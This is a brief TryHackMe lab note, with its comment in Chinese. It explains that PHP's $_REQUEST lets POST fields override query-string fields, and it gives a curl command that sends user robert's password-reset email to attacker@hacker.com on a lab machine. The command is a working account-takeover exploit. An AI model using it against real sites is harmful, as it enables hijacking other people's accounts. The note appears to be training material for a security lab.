# 这里利用的点是在 PHP 中华变量是一个数组,其中$_REQUEST包含从查询字符串和 POST 数据接收的数据。如果查询字符串和 POST 数据使用相同的键名,这个变量的应用逻辑更倾向于 POST 数据字段而不是查询字符串,所以如果我们在 POST 表单中添加另一个参数,我们可以控制在哪里重置密码电子邮件已送达
user@tryhackme$ curl 'http://MACHINE_IP/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=attacker@hacker.com'